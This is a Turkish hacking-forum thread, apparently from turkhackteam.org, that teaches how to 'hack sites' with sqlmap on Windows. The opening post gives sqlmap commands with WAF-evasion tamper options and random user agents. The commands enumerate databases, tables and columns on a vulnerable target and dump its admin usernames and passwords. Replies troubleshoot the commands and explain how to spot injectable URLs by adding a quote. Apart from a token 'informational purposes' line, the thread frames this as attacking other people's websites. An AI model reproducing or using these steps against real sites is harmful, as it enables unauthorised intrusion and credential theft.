Tamam
CMD İle SQL Injection Hack [Windows] - Site Hackleme / OBT İs HerYerDe
- Konuyu başlatan OBT is HeRYerDe
- Başlangıç tarihi
Tamam
Başaralı ellerine sağlıkDosyalar & Tool
+ Python 3.10.1 adlı setup ile Python kuruyoruz
+ sqlmap adlı dosyayı direkt Yerel Disk C'ye atıyoruz
+ sqlmap Klasörü İçindeki Dosyayı "sqlmap" Diye Değiştiriyoruz
Python İndirmek İçin Tıklayınız +++ SQLMAP İndirmek İçin Tıklayınız
sqlmap'ı CMD ile çalıştırma ;
Yukarıdakileri yaptıktan sonra Başlat'tan CMD konsolunu açalım ve konsol "C:" dizinine gelene kadar şu kodu yazalım ;
Kod:cd ../../
Konsol C:\ dizinine geldikten sonrada şu kodu yazalım ;
Kod:cd sqlmap
Database Çekimi ;
NOT: '403' Hatası Almamak İçin Verdiğim Parametreleri Kullanınız.
Kod:python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs
Veri Tabanı İsimleri Geldikten Sonra Şu Komutu Giriyoruz ; [information_schema Bizi İlgilendirmemektedir.]
Kod:python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME --Tables
Tablolar Geldikten Sonra İse Gireceğimiz Komut Bu ;
[Admin Ve Password Bilgilerinin Olduğu Tabloyu Tahmin Edebilirsiniz, Bulduk Varsayalım.]
Kod:python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLONAME --Columns
Kolonları Bulduktan Sonra Son Olarak Bu Komutu Giriyoruz ;
[Admin Ve Password Bilgilerini Çekeceğiz.]
Kod:python sqlmap.py -u sqlaçıklıhedefsite --random-agent -v3 --tamper="between,randomcase,space2comment" -D DATABASENAME -T TABLESNAME -C COLUMNNAME (örn: admin,pass) --dump
Beğenmeyi Unutmayın! İYİ FORUMLAR.
-Bilgilendirme Amaçlıdır-
ᴏʙᴛ ɪs ʜᴇʀʏᴇʀᴅᴇ
- Konuyu başlatan
- #24
bende yine olmuyor :/sqlmap Dosyasını C:\ Dizinine Attınız Mı
Teşekkürler.
Ne Demek.
İsterseniz DM Gelin, Anlatayım.
Ellerinize ve emeklerinize sağlık.
elinize sağlık
- Konuyu başlatan
- #28
eline sağlık.
NE MUTLU TÜRKÜM DİYENE!!!
NE MUTLU TÜRKÜM DİYENE!!!
- Konuyu başlatan
- #30
Bana şu hatayı veriyor
elinize sağlık
- Konuyu başlatan
- #33
Hata Değil, Şu Şekilde Çalıştırırsanız Olacaktır.Bana şu hatayı veriyor
python sqlmap.py hedefsite --dbsTeşekkürler.
çalıştırırsanız derken çalıştırdım zaten?
- Konuyu başlatan
- #35
Üstelik sql açığı olan URL ile yapmanız lazım örnek:Bana şu hatayı veriyor
Kod orada Dostum
Peki SQL açığı olup olmadığını nerden öğrenebilirim?
- Konuyu başlatan
- #37
URL'nin Sonuna
' koyunca Syntax Hatası veriyorsa vardır, Dilerseniz şu konumu da okuyun. SQL Açığı İle Site Hacklemek [Windows] - Uygulamalı
Hepinize Merhaba Değerli THT Üyeleri; Forumda "Site Nasıl Hacklenir / Site Hackleme Yolları" Gibi Çok Fazla Konu Açılıyor, Ben De En Kolay Site Hackleme Yöntemini Sizlere Sunuyorum. Daha Önceden 'sqlmap' Aracından Bahsetmiş; Nasıl Kurulacağını, Nasıl Kullanılacağından vb. Anlatmıştım. Biz CMD...
www.turkhackteam.org
teşekkürlerURL'nin Sonuna'koyunca Syntax Hatası veriyorsa vardır, Dilerseniz şu konumu da okuyun.
SQL Açığı İle Site Hacklemek [Windows] - Uygulamalı
Hepinize Merhaba Değerli THT Üyeleri; Forumda "Site Nasıl Hacklenir / Site Hackleme Yolları" Gibi Çok Fazla Konu Açılıyor, Ben De En Kolay Site Hackleme Yöntemini Sizlere Sunuyorum. Daha Önceden 'sqlmap' Aracından Bahsetmiş; Nasıl Kurulacağını, Nasıl Kullanılacağından vb. Anlatmıştım. Biz CMD...
- Konuyu başlatan
- #40
Teşekkürler Dostum.
